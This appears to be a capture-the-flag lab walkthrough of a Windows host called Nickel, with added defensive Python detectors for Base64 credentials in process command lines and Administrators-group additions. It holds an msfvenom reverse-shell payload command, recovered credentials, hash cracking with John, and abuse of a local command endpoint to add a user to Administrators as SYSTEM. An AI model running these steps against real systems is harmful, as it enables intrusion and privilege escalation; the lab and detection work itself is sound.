# Nickel

## Information Gathering

### Service Enumeration

`nmapAutomator.sh -H 192.168.90.99 -t full`

`nmapAutomator.sh -H 192.168.90.99 -t vulns`

![](/files/-Madc9yBhBUXjngbfuWQ)

### SMB (139)

![](/files/-MadcCdnJ2Tdv72s319q)

`msfvenom -p windows/shell_reverse_tcp LHOST=192.168.49.90 LPORT=443 EXITFUNC=thread -f python`

### HTTP

On port 8089, we have a dashboard:

![](/files/-MadcG24-jf27BIrOFQ5)

Each of the links brings us to 169.254.109.39:33333, a link-local address we cannot reach directly. Going to 192.168.90.99:33333 instead, we get a Not Found response for `/list-current-deployments`.

![](/files/-MadcIjCMFd_4CHnHxkV)

We get a different message, however, for `/list-running-procs`.

![](/files/-MadcLDizjz-8OVQZ--g)

If we send a POST request instead, we indeed see a list of running processes!

![](/files/-MadcNzZ2sGBG42VwDgl)

In the command line of one of the processes, we get a user's credentials.

![](/files/-MadcRXrAms03CEPU5E2)

Plugging the `-p` parameter into CyberChef, we can see that it is a Base64-encoded password (`NowiseSloopTheory139`).

![](/files/-MadcdpGKznO8df7REyT)
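The process list exposed the password only because it was passed as a Base64-encoded command-line argument, and that is something a defender can audit for. The following is an added example, not code from the original walkthrough: it scans a set of process command lines for flags that commonly carry a secret, decodes any Base64-looking value, and reports what it finds. The command lines are constructed samples (the `ftpsvc.exe` and `proxy.exe` names are invented), and the set of credential flags is an assumption to extend for your environment.

```python
import base64
import binascii
import re

# Flags that commonly carry a secret on a command line (assumption; extend as needed).
CRED_FLAGS = {"-p", "-pw", "-pass", "--password", "/p", "/password"}

# A Base64 token: only the Base64 alphabet, at least 8 chars, up to two '=' of padding.
B64_TOKEN = re.compile(r"^[A-Za-z0-9+/]{8,}={0,2}$")

# Constructed sample process command lines (not real output from the target).
# The second line mirrors the walkthrough: a service started with a Base64 password.
SAMPLE_COMMAND_LINES = [
    r"C:\Windows\System32\svchost.exe -k netsvcs",
    r"C:\Tools\ftpsvc.exe -u ariah -p "
    + base64.b64encode(b"NowiseSloopTheory139").decode(),
    r"C:\Tools\proxy.exe -p 8080 --verbose",  # -p here is a port, not a password
]


def decode_if_base64(token):
    """Return the decoded text if `token` is valid Base64 for printable text, else None."""
    if not B64_TOKEN.match(token) or len(token) % 4:
        return None
    try:
        raw = base64.b64decode(token, validate=True)
    except (binascii.Error, ValueError):
        return None
    try:
        text = raw.decode("ascii")
    except UnicodeDecodeError:
        return None
    return text if text.isprintable() else None


def find_exposed_credentials(command_lines):
    """Report every credential-style flag found, with its value decoded when it is Base64.

    A finding with decoded=None still deserves a look: the value may be a plaintext
    secret, or (as with a port number) a false positive a reviewer can dismiss.
    """
    findings = []
    for cmd in command_lines:
        parts = cmd.split()
        for i, part in enumerate(parts[:-1]):
            if part.lower() in CRED_FLAGS:
                value = parts[i + 1]
                findings.append(
                    {
                        "command": parts[0],
                        "flag": part,
                        "value": value,
                        "decoded": decode_if_base64(value),
                    }
                )
    return findings


if __name__ == "__main__":
    for f in find_exposed_credentials(SAMPLE_COMMAND_LINES):
        status = "DECODES TO %r" % f["decoded"] if f["decoded"] else "not Base64, review manually"
        print("%s %s %s -> %s" % (f["command"], f["flag"], f["value"], status))
```

On a live host the input would come from the same kind of process listing the walkthrough obtained (on Windows, `Get-CimInstance Win32_Process` exposes the `CommandLine` property); the scan is deliberately conservative and leaves the final judgement to a reviewer.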

Using the credentials `ariah:NowiseSloopTheory139`, we can SSH into the server.

![](/files/-Madch-rRynNWf0WllFA)

![](/files/-MadcjyL3e0d8NQGSs-G)

## Privilege Escalation

Using previously found credentials for `ariah`, we can access the FTP service and download a PDF file.

![](/files/-MadcmxlNY5XHeNWPUXD)

However, the PDF is password-protected, and the previously found password does not work.

![](/files/-MadcusSzyGqmXlTzxho)

Use `pdf2john.pl` to extract the hash.

`perl john-bleeding-jumbo/run/pdf2john.pl Infrastructure.pdf > Infrastructure-Hash.txt`

Use John the Ripper to crack the hash.

`john --wordlist=/usr/share/wordlists/rockyou.txt Infrastructure-Hash.txt`

![](/files/-Madd2d3-dAp4dFUQAu5)

The password is `ariah4168`.

In the PDF, we find a 'Temporary Command endpoint' at `http://nickel/` that is only accessible from the remote machine itself.

![](/files/-MaddNfwv6V0xyZ6_Cp8)

Using PowerShell, we can send a GET request to the API endpoint.

`$Resp = Invoke-WebRequest 'http://nickel/?whoami' -UseBasicParsing`

This executes `whoami`, and we can see the output below.

![](/files/-MaddeooDXYRfVag101z)

We have RCE as SYSTEM. However, any outgoing traffic is blocked, so we cannot spawn a second reverse shell as SYSTEM. Let's do the next best thing: add ourselves to the `Administrators` group.

`net localgroup Administrators ariah /add`

![](/files/-Maddi-WO9AwVUhIlUY3)

If we check the Administrators group again (`net localgroup Administrators`), we can see that our user `ariah` was added.

![](/files/-Madf3eW89-4k9VCyTkd)
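The group change just performed is exactly what a defender should be alerting on: Windows logs a member being added to a security-enabled local group as Security event ID 4732, and here the change was made by SYSTEM (the account the command endpoint runs as) rather than by an interactive administrator. The following is an added example, not part of the original walkthrough: it parses 4732 events in the standard Windows event XML format and raises the severity when the target group is `Administrators` or the subject is LOCAL SYSTEM. The events are constructed samples (the timestamps, SIDs and hostname are invented); the `S-1-5-32-544` and `S-1-5-18` well-known SIDs are real.

```python
import xml.etree.ElementTree as ET

EVENT_NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
ADMINISTRATORS_SID = "S-1-5-32-544"  # well-known SID of BUILTIN\Administrators
LOCAL_SYSTEM_SID = "S-1-5-18"        # well-known SID of NT AUTHORITY\SYSTEM

EVENT_TEMPLATE = """<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>{event_id}</EventID><TimeCreated SystemTime="{time}"/>
  <Computer>{computer}</Computer></System>
  <EventData>{data}</EventData>
</Event>"""


def sample_event(event_id, time, computer, **fields):
    """Build a constructed event in Windows event XML form (for demonstration only)."""
    data = "".join('<Data Name="%s">%s</Data>' % (k, v) for k, v in fields.items())
    return EVENT_TEMPLATE.format(event_id=event_id, time=time, computer=computer, data=data)


# Constructed sample events. The first mirrors the walkthrough: a local user added to
# Administrators by SYSTEM. For local accounts Windows fills MemberName with "-" and
# puts the identity in MemberSid, so the detection keys on SIDs, not names.
SAMPLE_EVENTS = [
    sample_event(4732, "2021-06-01T10:15:00Z", "nickel",
                 MemberName="-", MemberSid="S-1-5-21-1111-2222-3333-1001",
                 TargetUserName="Administrators", TargetDomainName="Builtin",
                 TargetSid=ADMINISTRATORS_SID,
                 SubjectUserSid=LOCAL_SYSTEM_SID, SubjectUserName="NICKEL$",
                 SubjectDomainName="WORKGROUP"),
    sample_event(4732, "2021-06-01T09:00:00Z", "nickel",
                 MemberName="-", MemberSid="S-1-5-21-1111-2222-3333-1002",
                 TargetUserName="Remote Desktop Users", TargetDomainName="Builtin",
                 TargetSid="S-1-5-32-555",
                 SubjectUserSid="S-1-5-21-1111-2222-3333-500", SubjectUserName="admin",
                 SubjectDomainName="NICKEL"),
    sample_event(4624, "2021-06-01T08:30:00Z", "nickel",
                 TargetUserName="ariah", LogonType="10"),  # unrelated logon event
]


def parse_event(xml_text):
    """Return event id, timestamp and the EventData name/value pairs of one event."""
    root = ET.fromstring(xml_text)
    event_id = int(root.find("e:System/e:EventID", EVENT_NS).text)
    time_created = root.find("e:System/e:TimeCreated", EVENT_NS).get("SystemTime")
    data = {d.get("Name"): (d.text or "") for d in root.findall("e:EventData/e:Data", EVENT_NS)}
    return {"event_id": event_id, "time": time_created, "data": data}


def assess_group_changes(events_xml):
    """Turn 4732 events into alerts, escalating on the conditions seen in this walkthrough."""
    alerts = []
    for xml_text in events_xml:
        ev = parse_event(xml_text)
        if ev["event_id"] != 4732:
            continue
        d = ev["data"]
        reasons = []
        if d.get("TargetSid") == ADMINISTRATORS_SID:
            reasons.append("member added to BUILTIN\\Administrators")
        if d.get("SubjectUserSid") == LOCAL_SYSTEM_SID:
            reasons.append("change performed by LOCAL SYSTEM, not an interactive admin")
        alerts.append(
            {
                "time": ev["time"],
                "group": d.get("TargetUserName"),
                "member_sid": d.get("MemberSid"),
                "subject": d.get("SubjectUserName"),
                "severity": "high" if reasons else "info",
                "reasons": reasons,
            }
        )
    return alerts


if __name__ == "__main__":
    for a in assess_group_changes(SAMPLE_EVENTS):
        print("[%s] %s: %s added to %s by %s %s"
              % (a["severity"].upper(), a["time"], a["member_sid"], a["group"],
                 a["subject"], "; ".join(a["reasons"])))
```

On a real host the XML would come from an export of the Security log (for example `wevtutil qe Security /q:"*[System[EventID=4732]]" /f:xml`), and the MemberSid would be resolved back to an account name at triage time; note that the event fires for `net localgroup ... /add` regardless of how the command was launched, so it catches the web-endpoint path used here as well as an interactive one.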

Now, we can RDP into the machine and run the command prompt as Administrator.

![](/files/-MadfTe8Yr3A1hWHFp7y)
